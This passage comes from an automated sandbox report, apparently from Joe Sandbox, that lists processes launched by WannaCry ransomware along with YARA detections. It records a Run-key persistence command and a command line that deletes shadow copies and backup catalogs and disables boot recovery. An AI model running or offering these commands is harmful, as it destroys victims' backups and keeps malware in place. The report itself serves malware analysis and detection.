                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:37
                                                          Start time:11:59:32
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:11:59:32
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:11:59:32
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:42
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:45
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:46
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:47
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:48
                                                          Start time:11:59:35
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:49
                                                          Start time:11:59:35
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:50
                                                          Start time:11:59:35
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:51
                                                          Start time:11:59:36
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:52
                                                          Start time:11:59:36
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:53
                                                          Start time:11:59:36
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:54
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:55
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:56
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:57
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:58
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:59
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe co
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          Antivirus matches:
                                                          • Detection: 96%, ReversingLabs
                                                          • Detection: 90%, Virustotal, Browse
                                                          Has exited:false

                                                          General

                                                          Target ID:60
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:61
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:62
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:63
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:64
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:65
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe vs
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:66
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:67
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:68
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                          Imagebase:0x190000
                                                          File size:59'392 bytes
                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:69
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:71
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:72
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:74
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:75
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:76
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:77
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:78
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:79
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:80
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:81
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff701e70000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:82
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:83
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:84
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:wmic shadowcopy delete
                                                          Imagebase:0x1d0000
                                                          File size:427'008 bytes
                                                          MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:85
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:86
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:TaskData\Tor\taskhsvc.exe
                                                          Imagebase:0x880000
                                                          File size:3'098'624 bytes
                                                          MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          • Detection: 0%, Virustotal, Browse
                                                          Has exited:false

                                                          General

                                                          Target ID:87
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:88
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:89
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:90
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:91
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:92
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
